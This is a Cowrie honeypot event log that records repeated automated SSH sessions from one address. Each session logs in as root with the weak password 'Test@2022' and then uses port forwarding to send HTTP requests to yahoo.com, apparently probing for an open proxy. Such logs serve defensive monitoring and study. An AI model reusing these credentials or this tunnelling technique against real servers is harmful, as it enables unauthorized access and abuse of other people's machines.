{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":11351,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11351","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.537918Z","session":"ee6ee90faa9b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.585804Z","src_ip":"213.209.150.239","session":"ee6ee90faa9b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.634337Z","src_ip":"213.209.150.239","session":"ee6ee90faa9b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25273,"dst_ip":"1.2.3.4","dst_port":22,"session":"2856ada6e0e7","protocol":"ssh","message":"New connection: 213.209.150.239:25273 (1.2.3.4:22) [session: 2856ada6e0e7]","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.680608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.682149Z","src_ip":"213.209.150.239","session":"2856ada6e0e7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.729422Z","src_ip":"213.209.150.239","session":"2856ada6e0e7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:01.967017Z","src_ip":"213.209.150.239","session":"2856ada6e0e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":16292,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:16292","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.015968Z","session":"2856ada6e0e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.063564Z","src_ip":"213.209.150.239","session":"2856ada6e0e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":17481,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17481","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.202012Z","session":"2856ada6e0e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.249607Z","src_ip":"213.209.150.239","session":"2856ada6e0e7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.298727Z","src_ip":"213.209.150.239","session":"2856ada6e0e7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25318,"dst_ip":"1.2.3.4","dst_port":22,"session":"594af129c934","protocol":"ssh","message":"New connection: 213.209.150.239:25318 (1.2.3.4:22) [session: 594af129c934]","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.344651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.345357Z","src_ip":"213.209.150.239","session":"594af129c934"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.392641Z","src_ip":"213.209.150.239","session":"594af129c934"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.627883Z","src_ip":"213.209.150.239","session":"594af129c934"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":23811,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:23811","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.675771Z","session":"594af129c934"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.722921Z","src_ip":"213.209.150.239","session":"594af129c934"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":1692,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:1692","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.861615Z","session":"594af129c934"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.908941Z","src_ip":"213.209.150.239","session":"594af129c934"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:02.956825Z","src_ip":"213.209.150.239","session":"594af129c934"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25366,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab3afc504aba","protocol":"ssh","message":"New connection: 213.209.150.239:25366 (1.2.3.4:22) [session: ab3afc504aba]","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.012609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.013493Z","src_ip":"213.209.150.239","session":"ab3afc504aba"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.070307Z","src_ip":"213.209.150.239","session":"ab3afc504aba"}
{"eventid":"cowrie.session.connect","src_ip":"218.17.175.145","src_port":50102,"dst_ip":"1.2.3.4","dst_port":23,"session":"57c244888e62","protocol":"telnet","message":"New connection: 218.17.175.145:50102 (1.2.3.4:23) [session: 57c244888e62]","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.249974Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.352084Z","src_ip":"213.209.150.239","session":"ab3afc504aba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":10448,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:10448","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.409793Z","session":"ab3afc504aba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.466496Z","src_ip":"213.209.150.239","session":"ab3afc504aba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":13204,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:13204","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.623176Z","session":"ab3afc504aba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.680179Z","src_ip":"213.209.150.239","session":"ab3afc504aba"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.737744Z","src_ip":"213.209.150.239","session":"ab3afc504aba"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25428,"dst_ip":"1.2.3.4","dst_port":22,"session":"d872bcdafec3","protocol":"ssh","message":"New connection: 213.209.150.239:25428 (1.2.3.4:22) [session: d872bcdafec3]","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.793368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.794935Z","src_ip":"213.209.150.239","session":"d872bcdafec3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:03.851567Z","src_ip":"213.209.150.239","session":"d872bcdafec3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.134161Z","src_ip":"213.209.150.239","session":"d872bcdafec3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":21370,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21370","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.192329Z","session":"d872bcdafec3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.248977Z","src_ip":"213.209.150.239","session":"d872bcdafec3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":24131,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24131","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.403102Z","session":"d872bcdafec3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.460007Z","src_ip":"213.209.150.239","session":"d872bcdafec3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.518933Z","src_ip":"213.209.150.239","session":"d872bcdafec3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25483,"dst_ip":"1.2.3.4","dst_port":22,"session":"e51035e84cbc","protocol":"ssh","message":"New connection: 213.209.150.239:25483 (1.2.3.4:22) [session: e51035e84cbc]","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.564855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.565893Z","src_ip":"213.209.150.239","session":"e51035e84cbc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.613404Z","src_ip":"213.209.150.239","session":"e51035e84cbc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.849101Z","src_ip":"213.209.150.239","session":"e51035e84cbc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":24792,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24792","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.897617Z","session":"e51035e84cbc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:04.945374Z","src_ip":"213.209.150.239","session":"e51035e84cbc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":16965,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16965","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.081667Z","session":"e51035e84cbc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.128948Z","src_ip":"213.209.150.239","session":"e51035e84cbc"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.177460Z","src_ip":"213.209.150.239","session":"e51035e84cbc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25531,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba1f6e8674ee","protocol":"ssh","message":"New connection: 213.209.150.239:25531 (1.2.3.4:22) [session: ba1f6e8674ee]","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.223468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.232193Z","src_ip":"213.209.150.239","session":"ba1f6e8674ee"}
